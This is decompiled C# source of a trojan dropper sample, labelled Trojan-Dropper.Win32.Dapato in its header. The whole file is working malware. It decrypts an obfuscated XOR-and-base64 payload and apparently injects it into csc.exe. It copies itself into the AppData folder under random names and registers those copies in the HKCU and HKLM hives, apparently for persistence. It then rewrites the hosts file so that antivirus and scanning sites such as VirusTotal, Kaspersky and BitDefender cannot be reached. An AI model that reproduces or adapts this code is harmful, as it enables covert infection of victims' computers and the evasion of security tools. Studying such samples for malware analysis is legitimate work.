// Decompiled with JetBrains decompiler // Type: YhGBdfMSltjPKLJOyGNdFEUKMEdGkiRFaQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQ.fIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDp // Assembly: rCWkXKkHG, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: 4D884AA0-6931-492A-BF88-91705CD23369 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.atdt-6d6f9fa7620cf0056d02556ff97c31ce6e6915683c9f12177fc6b506a2dc19c9.exe using Microsoft.VisualBasic.CompilerServices; using Microsoft.Win32; using System; using System.IO; using System.Reflection; using System.Resources; using System.Runtime.InteropServices; using System.Text; namespace YhGBdfMSltjPKLJOyGNdFEUKMEdGkiRFaQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQ { [StandardModule] internal sealed class fIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDp { private static ResourceManager pPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQ = new ResourceManager("duggsaogahsoghasikgasg", Assembly.GetExecutingAssembly()); private static string cDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwV = (string) fIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDp.pPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQ.GetObject("picturekashfklhaskgasg"); [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)] private static extern void Sleep(long dwMilliseconds); [STAThread] public static void Main() { try { } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } byte[] pByteArray = fIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDp.xordecrypt(Convert.FromBase64String(fIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDp.cDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwV), Encoding.Default.GetBytes("freetheweed")); try { } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } try { aQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLk.bmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLkkMUgJcIgxXxJDVFbLWcYjBPX(pByteArray, Conversions.ToString(Environment.SystemDirectory[0]) + ":\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\csc.exe"); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } try { gZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLkkMUgJcIgxXxJDVFbLWcYjBPXYhGBdfMSltjPKLJOyGNdFEUKMEdGkiRFaQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWa.rofl(); File.Copy(Assembly.GetExecutingAssembly().GetModules()[0].FullyQualifiedName, Environment.GetEnvironmentVariable("Appdata") + "\\KqJuyYy.exe"); NXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkq.KSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfj("BZohRyCWyD", "\"" + Environment.GetEnvironmentVariable("Appdata") + "\\KqJuyYy.exe\"", NXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkq.IAHSgioahsgiaoshgiposahg.TheCurrentoftheUSER); File.Copy(Assembly.GetExecutingAssembly().GetModules()[0].FullyQualifiedName, Environment.GetEnvironmentVariable("Appdata") + "\\KEWTpM.exe"); NXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkq.KSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfj("nYSZDQPfjm", "\"" + Environment.GetEnvironmentVariable("Appdata") + "\\KEWTpM.exe\"", NXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkq.IAHSgioahsgiaoshgiposahg.TheLocalofMachine); HOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLP.SJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGt(); object Instance = (object) new StreamWriter(Conversions.ToString(Registry.GetValue("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", "DataBasePath", (object) "oops")) + "\\hosts"); NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) "127.0.0.1 www.virustotal.com" }, (string[]) null, (Type[]) null, (bool[]) null, true); NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) Environment.NewLine }, (string[]) null, (Type[]) null, (bool[]) null, true); NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) "127.0.0.1 virustotal.com" }, (string[]) null, (Type[]) null, (bool[]) null, true); NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) Environment.NewLine }, (string[]) null, (Type[]) null, (bool[]) null, true); NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) "127.0.0.1 74.53.201.162" }, (string[]) null, (Type[]) null, (bool[]) null, true); NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) Environment.NewLine }, (string[]) null, (Type[]) null, (bool[]) null, true); NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) "127.0.0.1 www.virscan.org" }, (string[]) null, (Type[]) null, (bool[]) null, true); NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) Environment.NewLine }, (string[]) null, (Type[]) null, (bool[]) null, true); NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) "127.0.0.1 virscan.org" }, (string[]) null, (Type[]) null, (bool[]) null, true); NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) Environment.NewLine }, (string[]) null, (Type[]) null, (bool[]) null, true); NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) "127.0.0.1 61.180.255.138" }, (string[]) null, (Type[]) null, (bool[]) null, true); NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) Environment.NewLine }, (string[]) null, (Type[]) null, (bool[]) null, true); NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) "127.0.0.1 www.virusscan.jotti.org" }, (string[]) null, (Type[]) null, (bool[]) null, true); NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) Environment.NewLine }, (string[]) null, (Type[]) null, (bool[]) null, true); NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) "127.0.0.1 virusscan.jotti.org" }, (string[]) null, (Type[]) null, (bool[]) null, true); NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) Environment.NewLine }, (string[]) null, (Type[]) null, (bool[]) null, true); NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) "127.0.0.1 209.160.72.83" }, (string[]) null, (Type[]) null, (bool[]) null, true); NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) Environment.NewLine }, (string[]) null, (Type[]) null, (bool[]) null, true); NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) "127.0.0.1 www.kaspersky.com" }, (string[]) null, (Type[]) null, (bool[]) null, true); NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) Environment.NewLine }, (string[]) null, (Type[]) null, (bool[]) null, true); NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) "127.0.0.1 kaspersky.com" }, (string[]) null, (Type[]) null, (bool[]) null, true); NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) Environment.NewLine }, (string[]) null, (Type[]) null, (bool[]) null, true); NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) "127.0.0.1 38.117.98.208" }, (string[]) null, (Type[]) null, (bool[]) null, true); NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) Environment.NewLine }, (string[]) null, (Type[]) null, (bool[]) null, true); NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) "127.0.0.1 www.bitdefender.com" }, (string[]) null, (Type[]) null, (bool[]) null, true); NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) Environment.NewLine }, (string[]) null, (Type[]) null, (bool[]) null, true); NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) "127.0.0.1 bitdefender.com" }, (string[]) null, (Type[]) null, (bool[]) null, true); NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) Environment.NewLine }, (string[]) null, (Type[]) null, (bool[]) null, true); NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) "127.0.0.1 66.40.145.200" }, (string[]) null, (Type[]) null, (bool[]) null, true); NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) Environment.NewLine }, (string[]) null, (Type[]) null, (bool[]) null, true); NewLateBinding.LateCall(Instance, (Type) null, "Dispose", new object[0], (string[]) null, (Type[]) null, (bool[]) null, true); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } } private static byte[] xordecrypt(byte[] input, byte[] key) { byte[] numArray1 = Convert.FromBase64String(Encoding.Default.GetString(input)); byte[] numArray2 = new byte[checked (numArray1.Length - 2 + 1)]; byte num1 = numArray1[checked (numArray1.Length - 1)]; int num2 = checked (numArray2.Length - 1); int index = 0; while (index <= num2) { numArray2[index] = checked ((byte) ((int) numArray1[index] ^ unchecked ((int) (byte) ((uint) key[index % key.Length] << (checked (index + (int) num1 + key.Length) & 7)) % 256))); checked { ++index; } } return numArray2; } public static string ReverseString(string Value) { StringBuilder stringBuilder = new StringBuilder(); int index = checked (Value.Length - 1); while (index >= 0) { stringBuilder.Append(Value[index]); checked { index += -1; } } return stringBuilder.ToString(); } } }